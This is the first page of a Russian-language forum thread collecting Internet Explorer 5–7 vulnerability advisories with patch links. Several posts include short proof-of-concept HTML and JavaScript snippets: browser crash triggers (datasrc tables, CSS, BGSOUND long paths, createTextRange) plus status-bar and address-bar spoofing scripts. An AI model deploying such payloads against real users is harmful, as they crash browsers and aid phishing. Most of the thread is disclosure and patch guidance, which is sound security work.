+ Ответить в теме
Страница 1 из 5 1 2 3 4 5 ПоследняяПоследняя
Показано с 1 по 20 из 86

Тема: Internet Explorer - интернет браузер

  1. #1
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Internet Explorer - интернет браузер

    Повреждение памяти в реализации установления COM объектов в Microsoft Internet Explorer

    Программа:
    Internet Explorer 5.01 Service Pack 4
    Internet Explorer 5.5 Service Pack 2
    Internet Explorer 6

    Опасность: Критическая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

    Уязвимость обнаружена в библиотеке MDT2DD.DLL при инициализации COM объектов, которые не предполагались быть инициализированными в Internet Explorer. Удаленный пользователь может с помощью специально сформированной Web страницы повредить память и выполнить произвольный код на целевой системе с привилегиями текущего пользователя.

    Решение: Установите исправление с сайта производителя.

    Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4:
    http://www.microsoft.com/downloads/details.aspx?...3C7B06C3A30A

    Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4 or on Microsoft Windows XP Service Pack 1:
    http://www.microsoft.com/downloads/details.aspx?...1D1E3DC9732F

    Internet Explorer 6 for Microsoft Windows XP Service Pack 2:
    http://www.microsoft.com/downloads/details.aspx?...CB365F6FD3C5

    Internet Explorer 6 for Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1:
    http://www.microsoft.com/downloads/details.aspx?...60E01F3B3A59

    Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems:
    http://www.microsoft.com/downloads/details.aspx?...73A4D48E001A

    Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition:
    http://www.microsoft.com/downloads/details.aspx?...216C0260ACA3

    Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition:
    http://www.microsoft.com/downloads/details.aspx?...4E45F6D324EF

  2. #2
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Критические дыры в Windows Media Player и Internet Explorer

    Компания eEye Digital Security, специализирующаяся на вопросах сетевой безопасности, сообщает об обнаружении новых уязвимостей в программном обеспечении Microsoft. На этот раз дыры найдены в медиаплеере Windows Media Player и браузере Internet Explorer.

    По информации eEye, проблема проявляется на операционных системах Windows XP (в том числе со вторым сервис-паком), Windows NT, Windows 2003 (в том числе с первым сервис-паком) и всех версиях Windows 2000 при использовании медиаплеера и IE с настройками по умолчанию. Злоумышленник теоретически может получить полный доступ к удаленному компьютеру и выполнить на нем произвольный программный код с привилегиями текущего пользователя. Для реализации атаки нужно вынудить жертву открыть сформированный специальным образом файл или посетить вредоносную веб-страницу в интернете. Более подробная информация об уязвимостях, получивших рейтинг критических, из соображений безопасности не разглашается.

    Корпорация Microsoft уже поставлена в известность о проблеме и занимается ее изучением, отмечает CNET News. При этом представители Microsoft подчеркивают, что случаев практического использования дыр на сегодняшний день зафиксировано не было. Кстати, в браузере Internet Explorer, по данным датской компании Secunia, остаются открытыми, по крайней мере, еще двадцать уязвимостей, многие из которых позволяют выполнять вредоносный код на ПК вез ведома его владельца.

    Источник: compulenta.ru

  3. #3
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Отказ в обслуживании в Microsoft Internet Explorer c установленным J2SE

    Программа: Microsoft Internet Explorer 6.0

    Опасность: Средняя

    Наличие эксплоита: Да

    Описание: Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании браузера.

    Уязвимость обнаружена в библиотеке mshtmled.dll в Microsoft Internet Explorer с установленным J2SE Runtime Environment. Удаленны пользователь может с помощью специально сформированной web страницы вызвать отказ в обслуживании браузера.

    Пример:

    <FRAMESET >
    < FRAME SRC=AAAA >
    < EMBED NAME=SP STYLE= >
    < APPLET HSPACE=file:\\ >

    Решение: Способов устранения уязвимости не существует в настоящее время.

  4. #4
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Подмена строки состояния в Microsoft Internet Explorer

    Программа: Microsoft Internet Explorer 6.0

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание: Уязвимость позволяет удаленному пользователю подменить строку состояния браузера.

    Уязвимость существует при отображении URL в строке состояния браузера. Удаленный пользователь может изменить строке состояния и заставить пользователя обманом посетить злонамеренный сайта. Пример:

    <form action="[malicious site]">< a href="[trusted site]"><input type="image" src="[image]"></a>< /form>

    Решение: Способов устранения уязвимости не существует в настоящее время.

  5. #5
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию

    Выполнение произвольных команд в Microsoft Internet Explorer

    Программа: Microsoft Internet Explorer 5.5, 6.0

    Опасность: Критическая

    Наличие эксплоита: Да

    Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

    Повреждение памяти возможно при обработке HTML страницы, содержащей специально сформированные вызовы JavaScript "window()" объектов и onload событий. Удаленный пользователь может с помощью специально сформированной web страницы получить полный контроль над системой жертвы.

    Решение: Способов устранения уязвимости не существует в настоящее время.

    Пример/Эксплоит:
    Вложения
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  6. #6
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Раскрытие данных при импортировании CSS фалов в Microsoft Internet Explorer

    Программа: Internet Explorer 6.0

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю получить потенциально важные данные других пользователей.

    Уязвимость существует из-за отсутствия достаточной защиты от чтения содержимого, импортированного с другого домена, CSS (Cascading Style Sheets). Удаленный пользователь может создать специально сформированную Web страницу и просмотреть часть содержимого другого web сайта с помощью DHTML свойства "cssText". Злоумышленник может загрузить документ с помощью директивы "@import" и получить доступ к его содержимому посредством JavaScript сценария.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  7. #7
    Xamil
    Guest

    По умолчанию

    Не Существует идеала................

  8. #8
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Отказ в обслуживании в Microsoft Internet Explorer

    Программа: Microsoft Internet Explorer 5.01, 5.5, 6.0

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании браузера.

    Обнаружено разыменование нулевого указателя при обработке значения атрибута 'datasrc'. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать аварийное завершение работы браузера. Пример:

    > <table datasrc=".">

    Решение: Способов устранения уязвимости не существует в настоящее время.

  9. #9
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию Internet Explorer Version 6.0.2900.2180.xpsp_sp2 mshtml.dll <div> DOS exploit

    Код HTML:
    <!--------------------------------------------------------------------
    Internet Explorer Version 6.0.2900.2180.xpsp_sp2 mshtml.dll <div> Denial of Service exploit
    by rgod
    
    site: ***91;url***93;http://rgod.altervista.org***91;/url***93;
    mail: retrogod at aliceposta it
    original poc: ***91;url***93;http://rgod.altervista.org/ie_6_sp2_crash.html***91;/url***93;
    --------------------------------------------------------------------------->
    <head>
    <style><!--
    #page div p:first-child:first-letter {
       border-bottom: 2px ridge #F5DEB3;
    }
    //-->
    </style>
    </head>
    <body><div id="page"><div><p><strong>suntzu</strong></p>
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  10. #10
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service

    Код HTML:
    <table>
      <tr>
        <td><IMG align=left>X X X<?xml:namespace prefix=v>
          <v:X style="HEIGHT:1"></td>
      </tr>
    </table>
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  11. #11
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию

    Обнаружена уязвимость в Internet Explorer 7

    Стоило компании Microsoft начать открытое бета-тестирование своего нового браузера Internet Explorer 7.0 Beta 2, как в нем начали находить уязвимости. Том Феррис(Tom Ferris) обнаружил уязвимость в модуле "urlmon.dll", предназначенного для выполнения разбора HTML документов. Уязвимость заключается в недостаточных условиях ограничений обработки путя в теги "BGSOUND SRC" при использование протокола "file://". Таким образом злоумышленник указав длинный путь(например: 344 знака "-"), может вызвать "отказ от обслуживания" приложения и выполнить произвольный программный код. Уязвимость обнаружена в Internet Explorer 7.0 Beta 2 (7.0.5296.0).
    uinc.ru

    Internet Explorer 7.0 Beta 2 urlmon.dll DoS

    Release Date:
    Jan 31, 2006

    Severity:
    Medium

    Vendor:
    Microsoft

    Versions Affected:
    Internet Explorer 7.0 Beta 2 (7.0.5296.0)

    Overview:
    A denial of service vulnerability exists within Microsoft Internet
    Explorer 7.0 Beta 2 which allows for an attacker to cause the browser to
    crash, and or to execute arbitrary code on the targeted host.

    Technical Details:
    When running a specially crafted .html file, urlmon.dll
    inproperly parses the 'BGSOUND SRC=file://---' (approx. 344 dashes) and
    causes the crash.

    The following html code will trigger the crash:

    <BGSOUND
    SRC=file://---------------------------------------------------------------------
    --------------------------------------------------------------------------------
    --------------------------------------------------------------------------------
    --------------------------------------------------------------------------------
    ---------------------------------- >

    or hit the following url:

    http://www.security-protocols.com/poc/sp-x23.html

    Vendor Status:
    Microsoft was notified.

    Workaround:
    Mozilla Firefox

    Discovered by:
    Tom Ferris
    <tommy[at]security-protocols[dot]com>

    Related Links:
    http://www.security-protocols.com/advisory/sp-x23.txt
    http://security-protocols.com/module...ticle&sid=3169
    http://www.microsoft.com/windows/IE/...aredirect.mspx

    Copyright (c) 2006 Security-Protocols.com
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  12. #12
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Выполнение произвольного кода при обработке WMF файлов в Internet Explorer

    Программа:
    Internet Explorer 5.01 Service Pack 4 на Microsoft Windows 2000 Service Pack 4
    Internet Explorer 5.5 Service Pack 2 на Microsoft Windows Millennium

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

    Уязвимость существует из-за неизвестной ошибки при обработке WMF изображений. Удаленный пользователь может с помощью специально сформированного WMF файла выполнить произвольный код на целевой системе.

    Примечание: Эта уязвимость отличная от уязвимости, описанной в бюлетне MS06-001.

    Решение: Установите последнюю версию Internet Explorer 6 SP1

  13. #13
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию

    Выполнение кода через Drag-and-Drop в Microsoft Internet Explorer (code execution)

    Описание:

    Путем подмены окна назначения для drag-and-drop можно, например, установить вредоносное приложение в специальную папку на пользовательской системе. Уязвимость может быть использована для установки вредоносного кода, но требует взаимодействия с пользователем.

    Затронутые продукты:
    Internet Explorer 5.01
    Internet Explorer 5.5
    Internet Explorer 6.0
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  14. #14
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Обход ограничений безопасности в Internet Explorer

    Программа: Microsoft Internet Explorer 6.0

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:

    Уязвимость позволяет удаленному пользователю обойти ограничения безопасности.

    Уязвимость существует из-за того, что сетевая папка может быть включена в iframe, где только часть содержимого видно пользователю. Злоумышленник может обманом заставить пользователя удалить локальные папки на системе с помощью iframe ссылки "\\127.0.0.1\c$\".

    Для удачной эксплуатации уязвимости пользователь должен выбрать иконку папки, нажать клавишу удаления и утвердительно ответить в диалоговом окне "Folder Delete".

    Решение: Способов устранения уязвимости не существует в настоящее время.

  15. #15
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Переполнение буфера в Microsoft Internet Explorer

    Программа: Microsoft Internet Explorer 6.0

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.

    Уязвимость существует из-за ошибки при обработке большого количества обработчиков действий сценария внутри произвольного тега. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера в библиотеке mshtml.dll и аварийно завершить работу браузера.

    Демонстрационный эксплоит:
    http://lcamtuf.coredump.cx/iedie.html

    Решение: Способов устранения уязвимости не существует в настоящее время.

  16. #16
    Ветеран Mozart Набираю обороты Mozart Набираю обороты Mozart Набираю обороты Mozart Набираю обороты Mozart Набираю обороты Mozart Набираю обороты Аватар для Mozart
    Регистрация
    08.11.2004
    Сообщений
    1,263
    Поблагодарил(а)
    18
    Получено благодарностей: 328 (сообщений: 203).

    По умолчанию

    Цитата Сообщение от Vanda
    Программа: Microsoft Internet Explorer 6.0

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.

    Уязвимость существует из-за ошибки при обработке большого количества обработчиков действий сценария внутри произвольного тега. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера в библиотеке mshtml.dll и аварийно завершить работу браузера.

    Демонстрационный эксплоит:
    http://lcamtuf.coredump.cx/iedie.html

    Решение: Способов устранения уязвимости не существует в настоящее время.
    Может я чего-то не понял - у меня просто картинка открылась и все...Никакого завершения...

  17. #17
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию

    Программа: Microsoft Internet Explorer 6.x

    Опасность: Высокая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать переполнение динамической памяти.

    Уязвимость существует из-за ошибки при обработке вызова метода "createTextRange()", примененного к элементу радиокнопки (radio button). Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение динамической памяти и аварийно завершить работу браузера. Предполагается, что данная уязвимость может быть использована для выполнения произвольного кода.

    Пример/Эксплоит:

    Код HTML:
    <input type="checkbox" id='c'>
    <script>
    r=document.getElementById("c");
    a=r.createTextRange();
    </script>
    Решение: Способов устранения уязвимости не существует в настоящее время.
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  18. #18
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию

    Выполнение произвольных HTA файлов в Microsoft Internet Explorer

    Программа: Microsoft Internet Explorer 6.x

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

    Удаленный пользователь может с помощью специально сформированной Web страницы загрузить на удаленную систему произвольный HTA файл и затем выполнить его с привилегиями пользователя, запустившего браузер. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.

    Решение: Способов устранения уязвимости не существует в настоящее время.
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  19. #19
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Уязвимость состояния операции в Microsoft Internet Explorer

    Программа: Microsoft Internet Explorer 6.0

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:

    Уязвимость позволяет удаленному пользователю подменить содержимое адресной строки браузера и произвести фишинг-атаку.

    Уязвимость состояния операции обнаружена в Microsoft Internet Explorer при загрузке содержимого Web страницы и файлов формата Macromedia Flash (".swf") в окне браузера. Удаленный пользователь может подменить адресную строку браузера с помощью специально сформированного Flash файла. Пример:


    <a href="javascript:spoof()">Perform the second Test</a><br>
    <script>
    function makewin(url) {
    win = window.open (url, "new");
    }
    function spoof() {
    makewin('http://www.google.com/');
    setTimeout("makewin('http://one.fsphost.com/dangquang/musicflash1/bupbebietyeu.swf')",2000);
    setTimeout("makewin('http://www.microsoft.com/')",4000);
    }
    </script>

    Решение: Способов устранения уязвимости не существует в настоящее время.

  20. #20
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Множественные уязвимости в Microsoft Internet Explorer

    Программа: Microsoft Internet Explorer 5.01, 5.5, 6.0

    Опасность: Высокая

    Наличие эксплоита: Да

    Описание:

    Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, фишинг-атаки и выполнить произвольный код на целевой системе.

    1. Уязвимость существует в механизме междоменного перенаправления при обработке некоторых динамических объектов. Удаленный пользователь может посредством JavaScript URI обработчика, примененного к динамически созданному тегу “object”, выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Более подробное описание уязвимости:
    Переполнение динамической памяти в Microsoft Internet Explorer

    2. Уязвимость существует при обработке различных обработчиков событий HTML элемента (например, onLoad). Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.
    Более подробное описание уязвимости:
    Переполнение буфера в Microsoft Internet Explorer

    3. Уязвимость существует при обработке некорректного HTML кода. Удаленный пользователь может с помощью специально сформированной Web страницы повредить памяти и выполнить произвольный код на целевой системе.

    4. Уязвимость существует из-за ошибки инициализации COM объектов. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе.

    5. Уязвимость существует при обработке HTML элементов, содержащих специально сформированный тег. Удаленный пользователь может выполнить произвольный код на целевой системе.

    6. Уязвимость существует из-за ошибки при обработке двухбайтных символов в URL. Удаленный пользователь может вызвать повреждение памяти и выполнить произвольный код на целевой системе. Для успешной эксплуатации уязвимости, система должна использовать двухбайтную кодировку.

    7. Уязвимость существует из-за способа обработки IOleClientSite данных во время создания динамических объектов. Удаленный пользователь может выполнить произвольный код сценария в браузере жертвы в контексте безопасности другого сайта или другой зоны.

    8. Уязвимость существует из-за ошибки при обработке методов навигации. Удаленный пользователь может подменить содержимое адресной строки или любого другого элемента окна браузера и произвести фишинг-атаку.
    Более подробное описание уязвимости:
    Уязвимость состояния операции в Microsoft Internet Explorer

    9. Обнаружено несколько уязвимостей в ActiveX компонентах, содержащихся в Danim.dll и Dxtmsft.dll

    10. Уязвимость существует из-за ошибки при обработке HTA файлов. Удаленный пользователь может выполнить произвольный код на целевой системе.
    Более подробное описание уязвимости:
    Выполнение произвольных HTA файлов в Microsoft Internet Explorer

    Решение: Установите исправление с сайта производителя.

    Internet Explorer 5.01 SP4 on Windows 2000 SP4:
    http://www.microsoft.com/downloads/d...4-596E3E5C22B1

    Internet Explorer 6 SP1 on Windows 2000 SP4 or Windows XP SP1:
    http://www.microsoft.com/downloads/d...A-099FC57E0129

    Internet Explorer 6 for Windows XP SP2:
    http://www.microsoft.com/downloads/d...1-4ACCEBF72133

    Internet Explorer 6 for Windows Server 2003 and Windows Server 2003 SP1:
    http://www.microsoft.com/downloads/d...C-B27FAFA00054

    Internet Explorer 6 for Windows Server 2003 for Itanium-based systems and Windows Server 2003 with SP1 for Itanium-based systems:
    http://www.microsoft.com/downloads/d...F-AA2852AD62A3

    Internet Explorer 6 for Windows Server 2003 x64 Edition:
    http://www.microsoft.com/downloads/d...1-280FC35125C6

    Internet Explorer 6 for Windows XP Professional x64 Edition:
    http://www.microsoft.com/downloads/d...B-CA2D9EFF7AC3

+ Ответить в теме
Страница 1 из 5 1 2 3 4 5 ПоследняяПоследняя

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Похожие темы

  1. Opera - интернет браузер
    от Flagman в разделе Software
    Ответов: 329
    Последнее сообщение: 23.06.2014, 15:58
  2. Mozilla Firefox - интернет браузер
    от B|!zzard в разделе Software
    Ответов: 46
    Последнее сообщение: 23.09.2013, 07:38
  3. Google Chrome - интернет браузер
    от LoKos в разделе Software
    Ответов: 24
    Последнее сообщение: 27.02.2013, 16:13
  4. Яндекс.Браузер - интернет браузер
    от iriska в разделе Software
    Ответов: 8
    Последнее сообщение: 25.12.2012, 13:05
  5. Интернет браузер
    от Xaxa-xakep в разделе Delphi/Pascal
    Ответов: 15
    Последнее сообщение: 15.04.2007, 04:09

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
Рейтинг@Mail.ru
Администрация сайта не выражает согласия
с высказыванием участников форума и не несет
ответственности за их содержание.

Копирование любого материала возможно только
при наличии ссылки на сайт.